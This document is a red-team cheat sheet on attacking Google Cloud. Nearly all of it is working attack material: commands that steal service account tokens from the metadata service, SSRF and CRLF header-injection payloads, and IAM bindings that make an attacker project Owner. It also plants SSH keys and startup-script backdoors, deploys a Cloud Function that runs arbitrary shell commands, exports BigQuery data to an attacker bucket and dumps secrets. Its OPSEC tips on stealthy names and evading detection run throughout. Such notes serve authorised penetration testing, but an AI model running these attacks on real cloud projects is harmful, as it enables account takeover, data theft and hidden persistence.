Cloud VAPT Notes (GCP PrivEsc, Persistence, Evasion)

Edwin Tok | Shiro

Cloud Pentesting (GCP)


GCP - Metadata Service & Privilege Escalation

GCP Metadata Service Exploitation

Compute Engine Metadata Service:

# GCP Metadata Service endpoint (similar to AWS/Azure)
# Accessible from Compute Engine VMs, GKE nodes, App Engine flexible

# METADATA SERVICE v1 (current endpoint - requires the "Metadata-Flavor: Google" header;
# the legacy v1beta1/0.1 endpoints, which skipped the header check, are deprecated and disabled):

# Get all metadata
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" \
    -H "Metadata-Flavor: Google"

# Alternative IP address
curl "http://169.254.169.254/computeMetadata/v1/?recursive=true" \
    -H "Metadata-Flavor: Google"

# Get project ID
curl "http://metadata.google.internal/computeMetadata/v1/project/project-id" \
    -H "Metadata-Flavor: Google"

# Get project number
curl "http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id" \
    -H "Metadata-Flavor: Google"

# Get instance information
curl "http://metadata.google.internal/computeMetadata/v1/instance/name" \
    -H "Metadata-Flavor: Google"

curl "http://metadata.google.internal/computeMetadata/v1/instance/zone" \
    -H "Metadata-Flavor: Google"

# Get instance attributes (may contain secrets)
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true" \
    -H "Metadata-Flavor: Google"

# Get network information
curl "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/access-configs/0/external-ip" \
    -H "Metadata-Flavor: Google"

# CRITICAL: Get service account tokens
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google"

# List all available service accounts
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/" \
    -H "Metadata-Flavor: Google"

# Get token for specific service account
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/SA_EMAIL/token" \
    -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" \
    -H "Metadata-Flavor: Google"

# Get service account scopes (shows what APIs token can access)
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" \
    -H "Metadata-Flavor: Google"

# Get identity token (for authenticated Cloud Run, Cloud Functions)
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity?audience=https://example.com" \
    -H "Metadata-Flavor: Google"

# Get SSH keys (project-wide or instance-specific)
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys" \
    -H "Metadata-Flavor: Google"

curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/ssh-keys" \
    -H "Metadata-Flavor: Google"

# Get startup/shutdown scripts (may contain credentials)
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script" \
    -H "Metadata-Flavor: Google"

curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/shutdown-script" \
    -H "Metadata-Flavor: Google"

# OPSEC: Metadata access requires "Metadata-Flavor: Google" header
# No authentication needed from within GCP compute resources
# Access doesn't generate logs (unlike API calls)
# Tokens typically valid for 1 hour
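
# Quick loop (sketch - assumes curl and jq are on the box) to dump every service account
# exposed by the metadata server, with its scopes and token lifetime
MD="http://metadata.google.internal/computeMetadata/v1"
for sa in $(curl -s -H "Metadata-Flavor: Google" "$MD/instance/service-accounts/"); do
    echo "=== $sa"
    curl -s -H "Metadata-Flavor: Google" "$MD/instance/service-accounts/${sa}scopes"
    curl -s -H "Metadata-Flavor: Google" "$MD/instance/service-accounts/${sa}token" | jq '{expires_in, token_type}'
done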

SSRF to Metadata Service:

# GCP metadata requires custom header "Metadata-Flavor: Google"
# SSRF exploitation depends on ability to inject headers

# If you can control headers in SSRF:
GET /computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1
Host: metadata.google.internal
Metadata-Flavor: Google

# URL-encoded header injection attempts:
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token%0d%0aMetadata-Flavor:%20Google

# HTTP parameter pollution (if vulnerable):
http://vulnerable-app.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token&headers[Metadata-Flavor]=Google

# DNS rebinding attack (advanced):
# 1. Create domain that resolves to public IP initially
# 2. After DNS check, rebind to 169.254.169.254
# 3. Application fetches from metadata service

# Webhook-based SSRF (if application processes webhooks):
POST /webhook-handler
Content-Type: application/json
{
  "callback_url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
  "headers": {
    "Metadata-Flavor": "Google"
  }
}

# OPSEC: GCP metadata header requirement makes SSRF harder than AWS IMDSv1
# Look for header injection vulnerabilities
# Some frameworks may automatically add headers from query parameters
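
# Quick harness (sketch) to spray common header-smuggling parameter names at a fetch-style
# endpoint; vulnerable-app.com/fetch and the parameter names are hypothetical examples
TARGET="http://vulnerable-app.com/fetch"
MD_URL="http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
for p in "headers[Metadata-Flavor]=Google" "header=Metadata-Flavor:%20Google" "Metadata-Flavor=Google"; do
    echo "--- $p"
    curl -s "${TARGET}?url=${MD_URL}&${p}" | head -c 200
    echo
done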

Using Retrieved Access Tokens:

# Extract access token from metadata response
TOKEN=$(curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google" | jq -r '.access_token')

# Check token expiration
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google" | jq '.expires_in'

# Use token with gcloud (per-invocation, via the global --access-token-file flag)
echo "$TOKEN" > /tmp/token.txt
gcloud projects list --access-token-file=/tmp/token.txt

# Or set as an environment variable (gcloud honors CLOUDSDK_AUTH_ACCESS_TOKEN;
# Terraform's Google provider honors GOOGLE_OAUTH_ACCESS_TOKEN)
export CLOUDSDK_AUTH_ACCESS_TOKEN=$TOKEN

# Use token for direct API calls
curl -H "Authorization: Bearer $TOKEN" \
    "https://compute.googleapis.com/compute/v1/projects/PROJECT_ID/zones"

# Inspect the token (scopes, expiry, attached service account)
curl "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=$TOKEN"

# Response includes:
# - email: Service account email
# - scope: Granted OAuth scopes
# - expires_in: Time until expiration
# - azp: Authorized party (project number)

# Use token to list resources
curl -H "Authorization: Bearer $TOKEN" \
    "https://cloudresourcemanager.googleapis.com/v1/projects"

# OPSEC: Tokens from metadata service inherit VM's service account permissions
# Default compute service account often has Project Editor role (very powerful)
# Token usage appears as service account in logs (harder to attribute to attacker)
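
# Probe specific high-value permissions with the stolen token (sketch; extend the list as
# needed - testIamPermissions only reports back the permissions you actually hold)
curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"permissions":["resourcemanager.projects.setIamPolicy","iam.serviceAccountKeys.create","iam.serviceAccounts.getAccessToken"]}' \
    "https://cloudresourcemanager.googleapis.com/v1/projects/PROJECT_ID:testIamPermissions"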

GKE Metadata Service (Kubernetes-specific):

# GKE nodes also have metadata service access
# Workload Identity (modern) vs Service Account keys (legacy)

# WORKLOAD IDENTITY (Recommended, newer):
# Pods use Kubernetes service accounts mapped to GCP service accounts
# Metadata service returns tokens for mapped GCP SA

# Check if Workload Identity is enabled (WI clusters run the gke-metadata-server DaemonSet on each node)
kubectl get daemonset gke-metadata-server -n kube-system
# Or from outside the cluster:
gcloud container clusters describe CLUSTER_NAME --zone=ZONE \
    --format="value(workloadIdentityConfig.workloadPool)"

# From within a GKE pod with Workload Identity:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google"

# LEGACY SERVICE ACCOUNT KEYS:
# Older GKE workloads may mount GCP SA JSON keys as (Opaque) Kubernetes secrets
# Enumerate secrets and review anything that looks like key material
# (kubernetes.io/service-account-token secrets hold K8s API tokens, not GCP keys)
kubectl get secrets --all-namespaces -o json | \
    jq '.items[] | {ns: .metadata.namespace, name: .metadata.name, type: .type}'

# Every pod also has its Kubernetes SA token mounted (K8s API access, separate from GCP)
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# OPSEC: GKE metadata access same as Compute Engine
# Workload Identity is more secure but still exploitable
# Container escape may be needed to access node metadata

App Engine & Cloud Functions Metadata:

# App Engine Flexible and Cloud Functions also have metadata access
# Cloud Functions (2nd gen) use Cloud Run, which has similar metadata

# From Cloud Function (1st gen) - Python:
import requests

# Get an access token for the function's runtime service account
metadata_url = 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
headers = {'Metadata-Flavor': 'Google'}
response = requests.get(metadata_url, headers=headers)
token = response.json()['access_token']

# From Cloud Run / Cloud Functions (2nd gen):
# Same metadata service available
# curl commands work identically

# OPSEC: Serverless functions often have elevated permissions
# Metadata access from serverless is common pattern
# Harder to detect than direct VM compromise

Privilege Escalation Techniques

1. Service Account Key Creation (Most Common):

# Scenario: You have iam.serviceAccountKeys.create permission
# Create key for high-privilege service account

# List service accounts
gcloud iam service-accounts list --project=PROJECT_ID

# Identify high-privilege service accounts
gcloud projects get-iam-policy PROJECT_ID \
    --flatten="bindings[].members" \
    --filter="bindings.role:roles/owner OR bindings.role:roles/editor" \
    | grep serviceAccount

# Create key for target service account
gcloud iam service-accounts keys create key.json \
    --iam-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Authenticate with new key
gcloud auth activate-service-account --key-file=key.json

# Verify elevated permissions
gcloud projects get-iam-policy PROJECT_ID

# OPSEC: Key creation is logged in Cloud Audit Logs
# Keys never expire unless manually deleted
# Name downloaded key files after legitimate tooling output
# Store keys in Cloud Storage or Secret Manager (looks operational)
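
# Sketch (assumes gcloud + jq): check which service accounts you can mint keys for by
# asking the IAM testIamPermissions endpoint for each SA
for sa in $(gcloud iam service-accounts list --project=PROJECT_ID --format="value(email)"); do
    resp=$(curl -s -X POST \
        -H "Authorization: Bearer $(gcloud auth print-access-token)" \
        -H "Content-Type: application/json" \
        -d '{"permissions":["iam.serviceAccountKeys.create"]}' \
        "https://iam.googleapis.com/v1/projects/PROJECT_ID/serviceAccounts/${sa}:testIamPermissions")
    echo "$resp" | jq -e '.permissions | length > 0' >/dev/null && echo "[!] Can create keys for: $sa"
done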

2. Service Account Impersonation:

# Scenario: You have iam.serviceAccounts.getAccessToken or iam.serviceAccounts.actAs
# Impersonate service account without creating keys

# Test impersonation capability
gcloud iam service-accounts get-access-token TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# If successful, use impersonation flag for all commands
gcloud compute instances list \
    --impersonate-service-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Generate short-lived token as impersonated SA
gcloud auth print-access-token \
    --impersonate-service-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# Chain impersonation (SA1 -> SA2 -> SA3): pass a comma-separated delegation chain;
# the last service account in the list is the one actually impersonated
gcloud compute instances list \
    --impersonate-service-account=TARGET_SA1@PROJECT_ID.iam.gserviceaccount.com,TARGET_SA2@PROJECT_ID.iam.gserviceaccount.com,TARGET_SA3@PROJECT_ID.iam.gserviceaccount.com

# Generate access token via API (alternative method)
curl -X POST \
    -H "Authorization: Bearer $(gcloud auth print-access-token)" \
    -H "Content-Type: application/json" \
    -d '{"scope":["https://www.googleapis.com/auth/cloud-platform"]}' \
    "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/TARGET_SA@PROJECT_ID.iam.gserviceaccount.com:generateAccessToken"

# OPSEC: Impersonation is logged showing both impersonator and target
# Short-lived tokens (1 hour) require repeated impersonation
# More stealthy than key creation (no persistent credentials)
# Common in CI/CD and automation (blends in)
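
# Identity tokens (to reach IAM-protected Cloud Run / Cloud Functions endpoints) can be
# minted via the same impersonation path (sketch; audience = target service URL)
gcloud auth print-identity-token \
    --impersonate-service-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --audiences="https://TARGET-SERVICE-URL.a.run.app"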

3. IAM Policy Modification (Project/Org Level):

# Scenario: You have resourcemanager.projects.setIamPolicy (Owner role)
# Add yourself or service account to privileged role

# Get current IAM policy
gcloud projects get-iam-policy PROJECT_ID --format=json > policy.json

# Edit policy.json to add binding:
# {
#   "role": "roles/owner",
#   "members": [
#     "user:attacker@gmail.com"
#   ]
# }

# Apply modified policy
gcloud projects set-iam-policy PROJECT_ID policy.json
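
# Non-interactive alternative (sketch, assumes jq): append the binding and push the policy back
jq '.bindings += [{"role":"roles/owner","members":["user:attacker@gmail.com"]}]' \
    policy.json > policy-modified.json
gcloud projects set-iam-policy PROJECT_ID policy-modified.json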

# Or use add-iam-policy-binding (simpler)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="user:attacker@gmail.com" \
    --role="roles/owner"

# Add service account to privileged role
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:backdoor@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/editor"

# Organization-level escalation (if you have permissions)
gcloud organizations add-iam-policy-binding ORGANIZATION_ID \
    --member="user:attacker@gmail.com" \
    --role="roles/resourcemanager.organizationAdmin"

# OPSEC: IAM policy changes are heavily logged
# Changes generate immediate alerts in security-conscious orgs
# Use less obvious roles: "roles/iam.serviceAccountUser", "roles/iam.securityReviewer"
# Conditional bindings can hide escalation behind specific conditions

4. Compute Instance Metadata Modification:

# Scenario: You have compute.instances.setMetadata permission
# Add SSH keys or startup scripts to existing instances

# Get current instance metadata
gcloud compute instances describe INSTANCE_NAME \
    --zone=ZONE \
    --project=PROJECT_ID \
    --format=json

# Add SSH public key to instance
gcloud compute instances add-metadata INSTANCE_NAME \
    --zone=ZONE \
    --metadata=ssh-keys="attacker:ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" \
    --project=PROJECT_ID

# Add startup script (executes on reboot)
gcloud compute instances add-metadata INSTANCE_NAME \
    --zone=ZONE \
    --metadata-from-file=startup-script=backdoor.sh \
    --project=PROJECT_ID

# Project-wide SSH keys (affects all instances)
gcloud compute project-info add-metadata \
    --metadata=ssh-keys="attacker:ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" \
    --project=PROJECT_ID

# Modify instance service account (if you have permissions)
gcloud compute instances set-service-account INSTANCE_NAME \
    --zone=ZONE \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --scopes=https://www.googleapis.com/auth/cloud-platform \
    --project=PROJECT_ID

# OPSEC: Metadata changes are logged
# Project-wide SSH keys affect many instances (more visible)
# Startup scripts only execute on reboot (may need to wait or force reboot)
# Service account change requires instance restart

5. Cloud Storage Bucket IAM Escalation:

# Scenario: You have storage.buckets.setIamPolicy permission
# Grant yourself access to sensitive buckets

# List buckets
gsutil ls -p PROJECT_ID

# Get bucket IAM policy
gsutil iam get gs://BUCKET_NAME

# Add yourself to bucket IAM
gsutil iam ch user:attacker@gmail.com:objectViewer gs://BUCKET_NAME

# Or grant storage admin (full control)
gsutil iam ch user:attacker@gmail.com:admin gs://BUCKET_NAME

# Make bucket public (if you want to exfiltrate later)
gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME

# Check for buckets with sensitive data
for bucket in $(gsutil ls -p PROJECT_ID | grep gs://); do
    echo "Checking: $bucket"
    gsutil ls -r $bucket | grep -iE '(password|secret|key|credential|backup|database|prod)'
done

# OPSEC: Bucket IAM changes are logged
# Public buckets may trigger DLP or security alerts
# Use objectViewer (read-only) instead of admin to be less obvious
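
# Once access is granted, mirror anything interesting locally (sketch; -m parallelizes the copy)
gsutil -m cp -r gs://BUCKET_NAME ./loot/BUCKET_NAME/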

6. Cloud Functions / Cloud Run Deployment:

# Scenario: You have cloudfunctions.functions.create or run.services.create
# Deploy backdoor function/service with elevated service account

# Create backdoor Cloud Function
cat > main.py << 'EOF'
import functions_framework
import subprocess
import json

@functions_framework.http
def backdoor(request):
    request_json = request.get_json(silent=True)
    
    # Simple authentication
    if request_json and request_json.get('token') == 'SECRET_TOKEN':
        cmd = request_json.get('cmd', 'gcloud projects list')
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        return json.dumps({'output': result.stdout, 'error': result.stderr})
    
    return 'Unauthorized', 403
EOF

# Deploy with elevated service account
gcloud functions deploy backdoor-function \
    --runtime=python311 \
    --trigger-http \
    --allow-unauthenticated \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --region=us-central1 \
    --project=PROJECT_ID

# Get function URL
gcloud functions describe backdoor-function \
    --region=us-central1 \
    --format="value(httpsTrigger.url)"

# Test function
curl -X POST "https://REGION-PROJECT_ID.cloudfunctions.net/backdoor-function" \
    -H "Content-Type: application/json" \
    -d '{"token":"SECRET_TOKEN","cmd":"gcloud compute instances list"}'

# OPSEC: Function deployment is logged
# Use benign function names: "health-check", "webhook-handler", "api-gateway"
# Unauthenticated functions are common (but risky for backdoors)
# Add basic authentication to avoid accidental discovery
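
# If you drop --allow-unauthenticated, the function stays IAM-protected; invoke it with an
# identity token instead (sketch - the caller needs roles/cloudfunctions.invoker)
curl -X POST "https://REGION-PROJECT_ID.cloudfunctions.net/backdoor-function" \
    -H "Authorization: Bearer $(gcloud auth print-identity-token)" \
    -H "Content-Type: application/json" \
    -d '{"token":"SECRET_TOKEN","cmd":"gcloud projects list"}'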

7. Deployment Manager / Terraform Abuse:

# Scenario: You have deploymentmanager.deployments.create
# Deploy infrastructure with backdoors

# Create Deployment Manager template
cat > deployment.yaml << 'EOF'
resources:
- name: backdoor-sa
  type: iam.v1.serviceAccount
  properties:
    accountId: backup-automation
    displayName: Backup Automation Service Account
    
- name: backdoor-sa-key
  type: iam.v1.serviceAccounts.key
  properties:
    parent: $(ref.backdoor-sa.name)
    privateKeyType: TYPE_GOOGLE_CREDENTIALS_FILE
    
- name: backdoor-sa-binding
  type: cloudresourcemanager.v1.projectIamBinding
  properties:
    projectId: PROJECT_ID
    role: roles/editor
    members:
    - serviceAccount:$(ref.backdoor-sa.email)
    
outputs:
- name: serviceAccountKey
  value: $(ref.backdoor-sa-key.privateKeyData)
EOF

# Deploy
gcloud deployment-manager deployments create backdoor-deployment \
    --config=deployment.yaml \
    --project=PROJECT_ID

# Get outputs (service account key)
gcloud deployment-manager deployments describe backdoor-deployment \
    --project=PROJECT_ID

# OPSEC: Deployment Manager creates multiple resources in one operation
# Outputs can expose credentials
# Use infrastructure-themed names
# Templates can be complex, hiding malicious resources

8. Cloud SQL / Secret Manager Access:

# Scenario: You have cloudsql.instances.* or secretmanager.secrets.* permissions

# CLOUD SQL:

# List SQL instances
gcloud sql instances list --project=PROJECT_ID

# Get instance connection name
gcloud sql instances describe INSTANCE_NAME \
    --project=PROJECT_ID \
    --format="value(connectionName)"

# Create Cloud SQL user (if you have permissions)
gcloud sql users create backdoor \
    --instance=INSTANCE_NAME \
    --password=P@ssw0rd123 \
    --project=PROJECT_ID

# Connect to Cloud SQL (via Cloud SQL Proxy)
cloud_sql_proxy -instances=CONNECTION_NAME=tcp:3306 &
mysql -h 127.0.0.1 -u backdoor -pP@ssw0rd123

# Export database
gcloud sql export sql INSTANCE_NAME gs://BUCKET_NAME/database-backup.sql \
    --database=DATABASE_NAME \
    --project=PROJECT_ID

# SECRET MANAGER:

# List secrets
gcloud secrets list --project=PROJECT_ID

# Access secret values
gcloud secrets versions access latest \
    --secret=SECRET_NAME \
    --project=PROJECT_ID

# Create new secret (for persistence)
echo "attacker-credential" | gcloud secrets create backdoor-credential \
    --data-file=- \
    --replication-policy=automatic \
    --project=PROJECT_ID

# Grant yourself access to secret
gcloud secrets add-iam-policy-binding SECRET_NAME \
    --member="user:attacker@gmail.com" \
    --role="roles/secretmanager.secretAccessor" \
    --project=PROJECT_ID

# OPSEC: Secret access is logged with secret name
# Database exports are large and may be monitored
# Create secrets with benign names: "api-key-staging", "db-connection-string"
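
# Sketch: dump every secret the current identity can read (each access may show up in
# audit logs with the secret name, so this is noisy)
for s in $(gcloud secrets list --project=PROJECT_ID --format="value(name)" | awk -F/ '{print $NF}'); do
    echo "=== $s"
    gcloud secrets versions access latest --secret="$s" --project=PROJECT_ID 2>/dev/null
done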

9. BigQuery Data Exfiltration:

# Scenario: You have bigquery.tables.getData or bigquery.jobs.create

# List datasets
bq ls --project_id=PROJECT_ID

# List tables in dataset
bq ls --project_id=PROJECT_ID DATASET_ID

# Query table
bq query --use_legacy_sql=false \
    'SELECT * FROM `PROJECT_ID.DATASET_ID.TABLE_ID` LIMIT 100'

# Export table to Cloud Storage
bq extract \
    --destination_format=CSV \
    PROJECT_ID:DATASET_ID.TABLE_ID \
    gs://BUCKET_NAME/extracted-data.csv

# Create external table backed by a bucket you control (feeds attacker-controlled data into victim queries)
bq mk --external_table_definition=@CSV=gs://ATTACKER_BUCKET/data.csv \
    PROJECT_ID:DATASET_ID.exfiltrated_data
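
# Exfil via SQL (sketch): EXPORT DATA writes query results straight to GCS; the querying
# identity needs objectCreator on the destination bucket (grant that on a bucket you control)
bq query --use_legacy_sql=false \
    "EXPORT DATA OPTIONS(uri='gs://ATTACKER_BUCKET/export/*.csv', format='CSV', overwrite=true) AS
     SELECT * FROM \`PROJECT_ID.DATASET_ID.TABLE_ID\`"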

# OPSEC: BigQuery queries are logged with full SQL
# Large data exports may trigger DLP scans
# Use queries that look like analytics: "SELECT COUNT(*)", aggregations
# Export during business hours when data movement is normal

10. Workload Identity Federation Abuse:

# Scenario: Workload Identity Pool is misconfigured
# External identity (GitHub, AWS, Azure) can authenticate to GCP

# Check Workload Identity configuration
gcloud iam workload-identity-pools describe POOL_ID \
    --location=global \
    --project=PROJECT_ID

# Get provider details
gcloud iam workload-identity-pools providers describe PROVIDER_ID \
    --workload-identity-pool=POOL_ID \
    --location=global \
    --project=PROJECT_ID

# Look for weak attribute conditions
# Example vulnerable config:
# attributeCondition: "assertion.repository_owner=='target-org'"
# Can be bypassed by creating org with similar name

# Authenticate from external identity
# (Requires controlling external identity provider: GitHub Actions, AWS, etc.)

# Example: GitHub Actions workflow
# .github/workflows/exploit.yml
# Uses workload_identity_provider to get GCP token
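
# Sketch of such a workflow (all names/IDs below are placeholders) - commit it to a repo
# that satisfies the provider's attributeCondition:
cat > .github/workflows/exploit.yml << 'EOF'
name: sync
on: [workflow_dispatch]
permissions:
  id-token: write      # lets the job mint a GitHub OIDC token
  contents: read
jobs:
  gcp-auth:
    runs-on: ubuntu-latest
    steps:
      - uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/providers/PROVIDER_ID
          service_account: TARGET_SA@PROJECT_ID.iam.gserviceaccount.com
      - uses: google-github-actions/setup-gcloud@v2
      - run: gcloud projects list
EOF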

# OPSEC: Workload Identity Federation is newer, may be less monitored
# Attribute mappings may have weak validation
# External identity authentication generates different log patterns

GCP - Automated Tools & Persistence

Automated Reconnaissance Tools

GCP-IAM-Privilege-Escalation (Comprehensive Enumeration):

# Installation
git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation.git
cd GCP-IAM-Privilege-Escalation
pip3 install -r requirements.txt

# Authenticate first
gcloud auth login

# Enumerate permissions for current user/service account
python3 enumerate_member_permissions.py -p PROJECT_ID

# Output shows:
# - All permissions current identity has
# - Services accessible
# - Potential privilege escalation paths

# Check for privilege escalation opportunities
python3 check_for_privesc.py -p PROJECT_ID

# Output identifies:
# - Service accounts you can impersonate
# - Service accounts you can create keys for
# - Resources you can modify for escalation
# - IAM policies you can change

# Exploit specific privilege escalation method
# Example: Create service account key
python3 ExploitScripts/iam.serviceAccountKeys.create.py \
    -p PROJECT_ID \
    -s TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# Example: Impersonate service account
python3 ExploitScripts/iam.serviceAccounts.implicitDelegation.py \
    -p PROJECT_ID \
    -s TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# OPSEC: Enumeration scripts make many API calls
# Use during business hours to blend in
# Scripts identify exact escalation paths (saves manual testing)

CloudFox GCP Module:

# Download CloudFox
wget https://github.com/BishopFox/cloudfox/releases/latest/download/cloudfox-linux-amd64
chmod +x cloudfox-linux-amd64
mv cloudfox-linux-amd64 /usr/local/bin/cloudfox

# Full GCP assessment
cloudfox gcp --project PROJECT_ID all-checks

# Individual modules:

# IAM enumeration
cloudfox gcp --project PROJECT_ID iam
# Shows: Users, service accounts, roles, permissions

# Service account analysis
cloudfox gcp --project PROJECT_ID service-accounts
# Identifies: High-privilege SAs, impersonation opportunities

# Compute resources
cloudfox gcp --project PROJECT_ID instances
# Lists: VMs, external IPs, service accounts attached

# Storage enumeration
cloudfox gcp --project PROJECT_ID buckets
# Shows: Bucket permissions, public access, sensitive files

# Network analysis
cloudfox gcp --project PROJECT_ID networks
# Maps: VPCs, firewall rules, external access

# Secret enumeration
cloudfox gcp --project PROJECT_ID secrets
# Lists: Secret Manager secrets you can access

# Generate visual attack graph
cloudfox gcp --project PROJECT_ID graph

# Output to specific directory
cloudfox gcp --project PROJECT_ID all-checks --output-dir ./gcp-recon

# OPSEC: CloudFox generates comprehensive reports
# Read-only operations (safe for enumeration)
# Markdown output easy to review offline

ScoutSuite GCP Module:

# Installation
pip install scoutsuite

# Run GCP scan
scout gcp --project-id PROJECT_ID

# Scan multiple projects
scout gcp --project-id PROJECT_ID1,PROJECT_ID2,PROJECT_ID3

# Use specific credentials
scout gcp --project-id PROJECT_ID --service-account SA_KEY.json

# Custom ruleset
scout gcp --project-id PROJECT_ID --ruleset custom-rules.json

# No browser (headless)
scout gcp --project-id PROJECT_ID --no-browser

# Output directory
scout gcp --project-id PROJECT_ID --report-dir ./scout-gcp-report

# ScoutSuite checks:
# - IAM overly permissive roles
# - Service account key age
# - Compute Engine public IPs
# - Storage bucket public access
# - Cloud SQL instances without backups
# - Firewall rules allowing 0.0.0.0/0
# - Cloud Functions/Cloud Run unauthenticated
# - KMS key rotation
# - Logging and monitoring gaps

# OPSEC: Comprehensive security assessment tool
# Generates many API calls (use with caution)
# HTML report categorizes findings by severity

GCPBucketBrute (External Storage Enumeration):

# Installation
git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
cd GCPBucketBrute

# Basic brute force
python3 gcpbucketbrute.py -k keywords.txt -w wordlist.txt

# Use company name as seed
python3 gcpbucketbrute.py -k company-name -w wordlist.txt

# Check for public access
python3 gcpbucketbrute.py -k keywords.txt -w wordlist.txt --check-access

# Output to file
python3 gcpbucketbrute.py -k keywords.txt -w wordlist.txt -o found-buckets.txt

# Common naming patterns:
# - company-name-backups
# - projectid-logs
# - company-prod-data
# - projectid-terraform-state
# - company-artifacts
# - projectid-cloudbuild

# OPSEC: External reconnaissance (no authentication)
# No logs generated in target GCP project
# Rate limit requests to avoid detection

Custom GCP Enumeration Script:

#!/bin/bash
# GCP Red Team Enumeration Script
# Usage: ./gcp-enum.sh PROJECT_ID

PROJECT_ID=$1
OUTPUT_DIR="gcp-enum-${PROJECT_ID}"

echo "[*] GCP Red Team Enumeration"
echo "[*] Project: $PROJECT_ID"
echo "[*] Date: $(date)"
echo ""

# Create output directory
mkdir -p $OUTPUT_DIR

# Current identity
echo "[+] Current Identity:"
gcloud config get-value account | tee $OUTPUT_DIR/identity.txt

# Project info
echo ""
echo "[+] Project Information:"
gcloud projects describe $PROJECT_ID | tee $OUTPUT_DIR/project-info.txt

# IAM Policy
echo ""
echo "[+] Project IAM Policy:"
gcloud projects get-iam-policy $PROJECT_ID --format=json | \
    tee $OUTPUT_DIR/iam-policy.json

# Service Accounts
echo ""
echo "[+] Service Accounts:"
gcloud iam service-accounts list --project=$PROJECT_ID | \
    tee $OUTPUT_DIR/service-accounts.txt

# High-privilege service accounts
echo ""
echo "[+] High-Privilege Service Accounts:"
gcloud projects get-iam-policy $PROJECT_ID \
    --flatten="bindings[].members" \
    --filter="bindings.role:roles/owner OR bindings.role:roles/editor" \
    --format="table(bindings.role,bindings.members)" | \
    grep serviceAccount | tee $OUTPUT_DIR/privileged-sas.txt

# Compute Instances
echo ""
echo "[+] Compute Engine Instances:"
gcloud compute instances list --project=$PROJECT_ID | \
    tee $OUTPUT_DIR/instances.txt

# Storage Buckets
echo ""
echo "[+] Cloud Storage Buckets:"
gsutil ls -p $PROJECT_ID | tee $OUTPUT_DIR/buckets.txt

# Check for public buckets
echo ""
echo "[+] Checking for Public Buckets:"
for bucket in $(gsutil ls -p $PROJECT_ID); do
    echo "Checking: $bucket"
    gsutil iam get $bucket 2>/dev/null | grep -q "allUsers\|allAuthenticatedUsers" && \
        echo "  [!] PUBLIC: $bucket" | tee -a $OUTPUT_DIR/public-buckets.txt
done

# Cloud Functions
echo ""
echo "[+] Cloud Functions:"
gcloud functions list --project=$PROJECT_ID | tee $OUTPUT_DIR/functions.txt

# Cloud Run Services
echo ""
echo "[+] Cloud Run Services:"
gcloud run services list --project=$PROJECT_ID | tee $OUTPUT_DIR/cloudrun.txt

# GKE Clusters
echo ""
echo "[+] GKE Clusters:"
gcloud container clusters list --project=$PROJECT_ID | tee $OUTPUT_DIR/gke-clusters.txt

# Cloud SQL Instances
echo ""
echo "[+] Cloud SQL Instances:"
gcloud sql instances list --project=$PROJECT_ID | tee $OUTPUT_DIR/sql-instances.txt

# Secret Manager Secrets
echo ""
echo "[+] Secret Manager Secrets:"
gcloud secrets list --project=$PROJECT_ID | tee $OUTPUT_DIR/secrets.txt

# Enabled APIs
echo ""
echo "[+] Enabled APIs:"
gcloud services list --enabled --project=$PROJECT_ID | tee $OUTPUT_DIR/enabled-apis.txt

# Firewall Rules
echo ""
echo "[+] Firewall Rules (Permissive):"
gcloud compute firewall-rules list --project=$PROJECT_ID \
    --filter="sourceRanges.list():0.0.0.0/0" \
    --format="table(name,allowed[].ports,sourceRanges)" | \
    tee $OUTPUT_DIR/firewall-permissive.txt

